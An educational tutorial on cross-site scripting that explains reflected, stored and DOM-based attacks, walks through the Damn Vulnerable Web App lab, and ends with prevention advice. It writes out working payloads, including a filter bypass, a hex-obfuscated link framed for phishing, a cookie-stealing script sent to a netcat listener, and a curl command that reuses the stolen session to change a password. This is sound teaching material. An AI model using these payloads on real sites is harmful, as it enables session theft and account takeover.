XSS: Cross Site Scripting

Cross-Site Scripting (XSS) is a web-based code injection attack allowing a hacker to place client-side scripts into webpages viewed by others. It can occur when untrusted user input is displayed on a webpage without first being sanitized and/or properly encoded.

The bad news is XSS is widespread and can be very dangerous making it one of the Top 10 vulnerabilities according to the Open Web Application Security Project (OWASP). The good news is it can be easily prevented through proper sanitization of user inputs.

Where the Name Comes From

Back in the early days of Javascript, hackers figured out they could load a legitimate website as a frame in another website and then use Javascript to read into it. That is one website could use scripting to cross a boundary into another website, and XSS was born. Netscape countered with its same-origin policy, but hackers looked to ever more creative ways to circumvent this feature.

Note cross-site scripting has adopted the acronym XSS to distinguish it from Cascading Style Sheets (CSS), the language used to describe the visual presentation of web pages.

Evolution of XSS

Over the years XSS has evolved, and the name has become a bit of a misnomer, creating some confusion. The term cross-site implies a malicious website intruding into the functionality of a legitimate website, whereas today it mainly describes injecting malicious code onto a legitimate (but vulnerable) website (i.e., the second, malicious site typically is not present).

What Can Hackers Do?

If the XSS is effective, the hacker can do essentially anything you can!

  • Steal Your Cookies. Session hijacking.
  • Redirect You to Malicious Websites. Fake login pages, malware delivery websites.
  • Key logger. Access clipboard. Sniff other user events.
  • Rewrite DOM. Deface pages, replace content.
  • Access hardware Turn on webcam, mic, GPS, etc.

OWASP maintains a list of XSS incidents.


XSS Delivery Strategies

In the XSS discussion we normally consider three entities: a user, a (legitimate) website the user is trying to visit, and a hacker who is trying to deliver a malicious payload to the user.

Reflected/Non-Persistent XSS

Reflected XSS refers to the case where a hacker is able to inject code into the user’s request and the legitimate website returns it to the user in an unsanitized form. Typically the XSS payload is delivered inside of a legitimate-looking URL pointing to a legitimate (but vulnerable) website. When the user clicks the link, the payload is reflected back to the user by the server. In essence the user is attacking themselves.

Attack summary

  1. Attacker convinces user to click a maliciously crafted link to a legimate (but vulnerable) website
  2. Attack payload is (unwittingly) sent to server inside the client’s request
  3. Server-side processing incorporates the malicious script into the web page and returns it to client
  4. Client browser executes the malicous script

Stored/Persistant XSS

Persistent XSS refers to the case where a hacker is able to inject code that is stored on a webserver, and thus the malicious code originates from the server (as opposed to the client). If the site does not properly sanitize inputs, when the user visits the site, the hackers code is sent to the user. A typical example would be a post on a social media website; the hacker makes a post that is actually Javascript. When the user visits the site, the Javascript is loaded (and run) in their browser.

Attack summary

  1. Attacker injects attack payload into website’s database, e.g., by posting a maliciously crafted comment to a blog
  2. The user visit’s the legitimate website and requests the affected page
  3. The website generates the page (e.g., loads the most recent comments from the database) and returns the result to the client
  4. Client browser executes the malicous script

DOM-Based XSS

DOM-based XSS is similar to reflected XSS in the sense that the attack begins by trying to get the user to visit a maliciously constructed URL (to a legitimate site). The legitimate site reflects back the code to the user but the attack occurs indirectly in the DOM, instead of the directly in the returned HTML.

Attack summary

  1. Attacker convinces user to click a maliciously crafted link to a legimate website (as in the reflected attack)
  2. Server returns HTML including the vulnerable Javascript to client.
  3. Client browser executes the vulnerable javascript returned by the website, which loads the payload into the DOM at runtime.

Notice unlike the reflected attack, the attack payload is not direclty included in the html returned by the server. In reflected and stored XSS you would expect to see

<script> malicious code... </script>

directly in the returned HTML. In DOM-based XSS, the payload is only observed at runtime.

An Example

DOM-based XSS is becoming increasingly common as client-side page generation becomes more prevalent. For example, suppose the legitimate website had a script that creates a simple web page that tells you what your name is based on an argument in the URL.

<html>
	<script>
	function getQueryVariable(variable) {
	    var query = window.location.search.substring(1);
	    var vars = query.split('&');
	    for (var i = 0; i < vars.length; i++) {
	        var pair = vars[i].split('=');
	        if (decodeURIComponent(pair[0]) == variable) {
	            return decodeURIComponent(pair[1]);
	        }
	    }
	}
	document.write("Your name is" + getQueryVariable("name"));
	</script>
</html>

The getquery() function parses the URL looking, looking for the supplied argument and returns its value. The Javascript then renders a simple page with the name. So for example visiting http://goosite.com/index.html?name=aleks would generate the page

<html>
	<head></head>
	<body>
		Your name is Aleks
	</body>
</html>

So now if a hacker constructs a malicious string like

http://goodsite.com/index.html?name=<script>alert('Busted')</script>

then when the page loads, the HTML will become:

<html>
	<head></head>
	<body>
		Your name is <script>alert('Busted')</script>
	</body>
</html>

Notice how the HTML served to the user did not contain the alert() payload?

The getQueryVariable function is borrowed from here.

Damn Vulnerable Web App (DVWA)

To demonstrate XSS in action, we use the Damn Vulnerable Web Application (DVWA) framework. Here’s an installation guide for Kali Linux. If DVWA complains the PHP cannot write to files, you may need to change the file ownership:

chown -R www-data:www-data <dvwa directory>

Basic XSS

Once DVWA is up and running, we’ll start by going to the DVWA Security tab an setting the security level to low. Next we go to the Reflected XSS tab. Start by entering some text into the What is your name? text box and hit submit. The result will be: Hello <whatever you type>. So instead of entering plain text, try entering some Javascript:

<script>alert('Hello XSS')</script>

Now you should see a Javascript alert with the message “Hello XSS”. Ok, let’s try something else. How about a redirect:

<script>document.location = "http://google.com"</script>

Of course if you can inject Javascript, you can probably HTML. One popular XSS tactic of yesteryear was to load another webpage in an <iframe>:

<iframe src="http://uwo.ca"></iframe>

Now in reflected XSS, we’re usually talking about the malicious code being delivered in a URL. Suppose we wish to encode our first example as a URL:

http://goodsite.com/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27Hello%20XSS%27%29%3C/script%3E

Now imagine we put this link in an email! Even if the user inspects the link and finds the site is legitimate, if the site is vulnerable to XSS, then the user will still be subjected to the attack (unless of course the user has Javascript disabled!).

More Complex XSS

Now suppose we wish to do something more complex involving functions and variables, like changing elements in the DOM. We need to wait for the DOM to load before we can make changes, so we can invoke window.onload to wait. Then we run arbitrary Javascript. In this example, we replace the link to the OWASP article on XSS with a link to evilsite (and even change the link color to red for effect):

<script>
	window.onload = function() {
		s=document.getElementsByTagName("a")[17];
		s.href="http://evilsite.com";
		s.text="http://evilsite.com";s.style.color="red";
	}
</script>

When encoded as a URL it becomes:

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.onload%20=%20function%28%29%20{s=document.getElementsByTagName%28%22a%22%29[17];s.href=%22http://evilsite.com%22;s.text=%22http://evilsite.com%22;s.style.color=%22red%22;}%3C/script%3E

From there we can further obfuscate the URL to contain hex values:

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64=%66%75%6E%63%74%69%6F%6E%28%29%7B%73=%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%5B%31%37%5D%3B%73%2E%68%72%65%66=%22%68%74%74%70%3A%2F%2F%65%76%69%6C%73%69%74%65%2E%63%6F%6D%22%3B%73%2E%74%65%78%74=%22%68%74%74%70%3A%2F%2F%65%76%69%6C%73%69%74%65%2E%63%6F%6D%22%3B%73%2E%73%74%79%6C%65%2E%63%6F%6C%6F%72=%22%72%65%64%22%3B%7D%3C%2F%73%63%72%69%70%74%3E

Now stick that in a phishing email.

Let’s simulate a passive malicious website evilsite that steals cookies stolen from a site goodsite using a cross site scripting attack. The XSS directs a user visiting goodsite to fetch a (non-existent) image from evilsite. This has two components:

  1. Phone home. The XSS Javascript fetches the image but it is not added to the DOM, so from the user’s perspective nothing unusual-looking happened. The image doesn’t exist, and the malicious server doesn’t respond. It’s just a low-profile way to contact the malicious server.
  2. Exfiltrate cookie. The XSS Javascript sets the URL of the “image” to the malicious website + the legit website’s cookie, e.g.,
http://evilsite.com/<cookie>

Instead of creating a whole separate web server for evilsite we can simulate one by putting a network listener on another port. So in this example localhost:80 will represent goodsite.com and localhost:1234 will represent evilsite. We then setup netcat to listen on port 1234:

netcat -lvp 1234

Then we construct our XSS payload as follows:

<script>new Image ().src="http://localhost:1234/"+document.cookie;</script>

This dummy request sends the user’s cookie to evilsite who registers the following GET request from the user’s machine:

connect to [127.0.0.1] from localhost [127.0.0.1] 38900
GET /security=low;%20PHPSESSID=kavqn49seghn91lcbs6j411v75 HTTP/1.1
...

evilsite now has the user’s cookie!

Recall the owners of evilsite used XSS to steal a user’s cookie. Now they wish to use it to impersonate the user, for example, to change the user’s password .

curl --cookie "/security=low;%20PHPSESSID=kavqn49seghn91lcbs6j411v75" --location "localhost/dvwa/vulnerabilities/csrf/?password_new=chicken&password_conf=chicken&Change=Change#" | grep "Password"

The result is:

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4865  100  4865    0     0   168k      0 --:--:-- --:--:-- --:--:--  169k
		<pre>Password Changed.</pre>

XSS Under Harder DVWA Security Levels

Medium

Suppose we set the DVWA security level to Medium and revisit the XSS (Stored) page. Suppose we try to add the message:

<script>alert('busted!')</script>

This time no alert is displayed. Instead the following text appears in the comment field:

alert(\'busted!\')

Obviously the website is now doing some checking. Inspecting source/medium.php we see find the following relevant code validating the name field:

// Sanitize name input
$name = str_replace( '<script>', '', $name );

Notice any instance of <script> is deleted. However, it only checks for this exact match. So how about we try:

<Script>alert('busted!')</script>

It works!

High

Now lets go to the High security level. Inspecting source/high.php we find different code validating the name field:

// Sanitize name input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

This is using the PHP preg_replace function which uses regular expressions to find and replace offending string patterns. In this case it is looking for the pattern:

<*s*c*r*i*p*t

and delete any such occurrence, and uses the /i modifier to make it case insensitive. This does a pretty good job of sanitizing out any <script> tags, but it wouldnt, for example, catch the <iframe> attack described above.

Impossible

Now we examine the Impossible security level. Inspecting source/impossible.php we find yet again new code for validating the name field:

$name = stripslashes( $name );
$name = htmlspecialchars( $name );

In particular the htmlspecialchars() looks for special HTML characters and converts them to HTML entities. So e.g., <script> becomes &lt;script&gt;. This input is now protected against XSS.

Preventing XSS

Security Headers

One important means of preventing XSS attacks is by setting strict Content Security policies to allow approved content and reject all other content.

Escaping Special Characters

Preventing XSS is all about escaping characters that have special meaning. For example the following characters should be escaped as follows:

 & --> &amp;
 < --> &lt;
 > --> &gt;
 " --> &quot;
 ' --> &#x27;
 / --> &#x2F; 

The important thing is to use an existing library for sanitizing strings (don’t write it yourself!).

Further Reading